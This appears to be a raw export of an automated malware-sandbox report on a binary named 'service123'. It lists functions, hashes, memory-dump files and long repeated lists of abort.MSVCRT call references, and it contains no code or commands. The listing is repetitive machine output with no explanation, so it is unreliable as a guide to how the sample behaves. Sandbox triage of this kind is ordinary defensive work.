Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID: `:Bl
API String ID: 4206212132-2584022158
Opcode ID: 0b460de3b0c57783a94de207b96af4f63ab124ecf01ca84bc073b096989fed83
Instruction ID: 69e76913b258761c158167200cedef933b3ecb2437638b25cc3449a9cc9b301e
Opcode Fuzzy Hash: 0b460de3b0c57783a94de207b96af4f63ab124ecf01ca84bc073b096989fed83
Instruction Fuzzy Hash: 5CF0F4B1645201CBD704EF18D0A5FAAB7B1FB12308F019A58C4949BF46D735E429CF95

Function 6C34BAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Strings

@, xrefs: 6C34BAB1

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 4e37339e891414197050542e335a7ee44ed8732e16c27ee117a39a8c183e3896
Instruction ID: 45604f2c40a9439e59c3cc815f907b0d4cca6dde8e4cb9d9b668ccdb93a3f45e
Opcode Fuzzy Hash: 4e37339e891414197050542e335a7ee44ed8732e16c27ee117a39a8c183e3896
Instruction Fuzzy Hash: 0AB1463260CB198FC310CE2CD490BAAB7E6AB8531CF49856DD9948BF45D735E808CF91

Function 6C342290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bab9ec3be64b3460424fcede5f795d9856b12d96396dd9fc057c6822ee799c
Instruction ID: 8f7fef407ef70ffdd743df5bb82dddb586f3b3803cf629151abf21a43247f4ea
Opcode Fuzzy Hash: a5bab9ec3be64b3460424fcede5f795d9856b12d96396dd9fc057c6822ee799c
Instruction Fuzzy Hash: 7BC1CE716042018FD704CF29C58475ABBF2AF45318F55C969D898EFB46E73AE90ACFA0

Function 6C34B7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef8958408018c1fa2adf3279bf2b254953d37b9a18f916618021dda4315ea70
Instruction ID: 703f714fb0d8674ba3ecc19b42112c94c25ac89aed8068489dd22fc6f6fa8ded
Opcode Fuzzy Hash: aef8958408018c1fa2adf3279bf2b254953d37b9a18f916618021dda4315ea70
Instruction Fuzzy Hash: 6141B075909B859FE711CF29C080B2ABBE0AF8532CF18C99DD9964FB52D332E845CB51

Function 6C3429F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7179ac13127a9e821e6c9f6b61ab5183362405ff6ee5bea8cbaefa76584adf44
Instruction ID: 46fcda1bbdc7d49245f78ab7bbee05f93db5b89d4a56aa99eb07ef2bf94a3101
Opcode Fuzzy Hash: 7179ac13127a9e821e6c9f6b61ab5183362405ff6ee5bea8cbaefa76584adf44
Instruction Fuzzy Hash: 8201D6B2605201CBE704EF28D495F65B7B1FB11309F019A58D184DBA15D739E828CFA5

Function 6C3428BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 5b03a203bec6bdf1d327e238bddfe3616516e4b866a5765079df256283089f28
Instruction ID: 79ba629eaa6b15006d2c2108654411d9d714351ce17be519dad4440c121d9d61
Opcode Fuzzy Hash: 5b03a203bec6bdf1d327e238bddfe3616516e4b866a5765079df256283089f28
Instruction Fuzzy Hash: 470114B2646201CBE708EF18D491F6AB7B1FB12309F019A58C1859BB05D739E828CFA5

Function 6C342A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3cb6574504c15ce3106ea66220e33775351bb9b7f10f2fc94702ae49b92ced09
Instruction ID: c033f5359efaa3d0f4e12ef1f36da38d3bd47401da4e3837b446484a1f39bafc
Opcode Fuzzy Hash: 3cb6574504c15ce3106ea66220e33775351bb9b7f10f2fc94702ae49b92ced09
Instruction Fuzzy Hash: 780137B2645201CBE704EF18D491F6AB7B1FB12309F019A48C4949BB05D735E428CFA5

Function 6C342B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 17705fe01286ccb0bd9727b44b281bcd89957136f2802d06cf8f2d8f36c785a0
Instruction ID: 674a2df3c288f4e1e9887f4c4b74f141e50133f35642b8abdb440391a4df08e0
Opcode Fuzzy Hash: 17705fe01286ccb0bd9727b44b281bcd89957136f2802d06cf8f2d8f36c785a0
Instruction Fuzzy Hash: AEF0F4B1A49601CBE704EF18D495FAAB7B1FB12309F019A58C4949BF46D735E428CFE1

Function 6C342AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C416CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 964a605cec11c416cbf8b7d587c40bb7a3972025e21ca8d93d05e2ae07a1f97d
Instruction ID: eb000d1fa1d8ed172c7b0f60ba964e61d1a1c3c20342f9b98ec1474ada34cbe8
Opcode Fuzzy Hash: 964a605cec11c416cbf8b7d587c40bb7a3972025e21ca8d93d05e2ae07a1f97d
Instruction Fuzzy Hash: D0F03AB16492018BD704EF18C090FAAB7B1FF02308F019958C4959BF46D735E428CFD1

Function 6C34B930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D03
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D08
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
